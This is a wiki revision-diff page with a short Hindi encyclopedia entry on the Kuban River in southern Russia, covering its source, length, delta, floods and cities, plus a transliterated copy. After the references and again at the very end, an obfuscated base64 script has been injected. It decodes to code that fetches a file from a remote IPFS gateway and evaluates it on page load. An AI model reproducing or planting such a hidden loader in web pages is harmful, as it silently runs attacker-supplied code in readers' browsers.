Difference between revisions of "कूबान नदी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
'''कूबान नदी''' दक्षिणी [[रूस]] की नदी है, जो काकेशस पर्वत की सर्वोच्च चोटी 'एलब्रूस' (18,471 फुट) से निकल कर उत्तर तथा पश्चिम उत्तर की ओर प्रवाहित होती है। इस नदी की लंबाई लगभग 550 मील तथा जल प्रवाह क्षेत्र 21,500 वर्ग मील है।<ref>{{cite web |url=http://bharatkhoj.org/india/%E0%A4%95%E0%A5%82%E0%A4%AC%E0%A4%BE%E0%A4%A8 |title=कूबान|accessmonthday=14 नवम्बर|accessyear= 2013|last= |first= |authorlink= |format= |publisher= |language=हिंदी}}</ref>
+
'''कूबान नदी''' [[रूस|दक्षिणी रूस]] की नदी है, जो काकेशस पर्वत की सर्वोच्च चोटी 'एलब्रूस'<ref>18,471 फुट</ref> से निकल कर उत्तर तथा पश्चिम उत्तर की ओर प्रवाहित होती है। इस नदी की लंबाई लगभग 550 मील तथा जल प्रवाह क्षेत्र 21,500 वर्ग मील है।<ref>{{cite web |url=http://bharatkhoj.org/india/%E0%A4%95%E0%A5%82%E0%A4%AC%E0%A4%BE%E0%A4%A8 |title=कूबान|accessmonthday=14 नवम्बर|accessyear= 2013|last= |first= |authorlink= |format= |publisher= |language=हिंदी}}</ref>
  
*डेल्टाई क्षेत्र में कूबान नदी की अनेक शाखाएँ हो गई हैं, जिनमें से दो अजीव सागर तथा एक काले सागर में गिरती है।
+
*[[डेल्टा|डेल्टाई क्षेत्र]] में कूबान नदी की अनेक शाखाएँ हो गई हैं, जिनमें से दो अजीव सागर तथा एक काले सागर में गिरती है।
*नदी के पहाड़ी भागों में अनेक प्रपात हैं। उनके कारण जलविद्युत विकास की दृष्टि से यह महत्वपूर्ण है।
+
*नदी के पहाड़ी भागों में अनेक प्रपात हैं। उनके कारण जल विद्युत विकास की दृष्टि से यह महत्वपूर्ण है।
 
*समतल क्षेत्र में यह नदी अपना मार्ग परिवर्तन करती है, अत: इसमें जहाज़ मुहाने से केवल 75 मील की दूरी तक ही आते हैं।
 
*समतल क्षेत्र में यह नदी अपना मार्ग परिवर्तन करती है, अत: इसमें जहाज़ मुहाने से केवल 75 मील की दूरी तक ही आते हैं।
*डेल्टाई क्षेत्र दलदली होने के कारण मलेरिया ग्रस्त रहता है। [[दिसंबर]] से [[फरवरी]] तक कूबान नदी का पानी जमा रहता है।
+
*डेल्टाई क्षेत्र दलदली होने के कारण [[मलेरिया]] ग्रस्त रहता है। [[दिसंबर]] से [[फरवरी]] तक कूबान नदी का पानी जमा रहता है।
*कूबान नदी में प्रतिवर्ष तीन बार [[बाढ़]] आती है- [[बसंत ऋतु|बसंत]] तथा [[ग्रीष्म ऋतु]] में बर्फ पिघलने के कारण और शिशिर में [[वर्षा]] के कारण।
+
*कूबान नदी में प्रतिवर्ष तीन बार [[बाढ़]] आती है- [[बसंत ऋतु|बसंत]] तथा [[ग्रीष्म ऋतु]] में बर्फ पिघलने के कारण और [[शिशिर ऋतु|शिशिर]] में [[वर्षा]] के कारण।
 
*नदी के किनारे 'क्रास्नोडर' और 'चर्केस्क' नामक दो प्रमुख नगर स्थित हैं।
 
*नदी के किनारे 'क्रास्नोडर' और 'चर्केस्क' नामक दो प्रमुख नगर स्थित हैं।
  

Latest revision as of 10:40, 13 January 2020

kooban nadi dakshini roos ki nadi hai, jo kakeshas parvat ki sarvochch choti 'elabroos'[1] se nikal kar uttar tatha pashchim uttar ki or pravahit hoti hai. is nadi ki lanbaee lagabhag 550 mil tatha jal pravah kshetr 21,500 varg mil hai.[2]

  • deltaee kshetr mean kooban nadi ki anek shakhaean ho gee haian, jinamean se do ajiv sagar tatha ek kale sagar mean girati hai.
  • nadi ke paha di bhagoan mean anek prapat haian. unake karan jal vidyut vikas ki drishti se yah mahatvapoorn hai.
  • samatal kshetr mean yah nadi apana marg parivartan karati hai, at: isamean jahaz muhane se keval 75 mil ki doori tak hi ate haian.
  • deltaee kshetr daladali hone ke karan maleriya grast rahata hai. disanbar se pharavari tak kooban nadi ka pani jama rahata hai.
  • kooban nadi mean prativarsh tin bar badh ati hai- basant tatha grishm rritu mean barph pighalane ke karan aur shishir mean varsha ke karan.
  • nadi ke kinare 'krasnodar' aur 'charkesk' namak do pramukh nagar sthit haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. 18,471 phut
  2. kooban (hiandi). . abhigaman tithi: 14 navambar, 2013.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>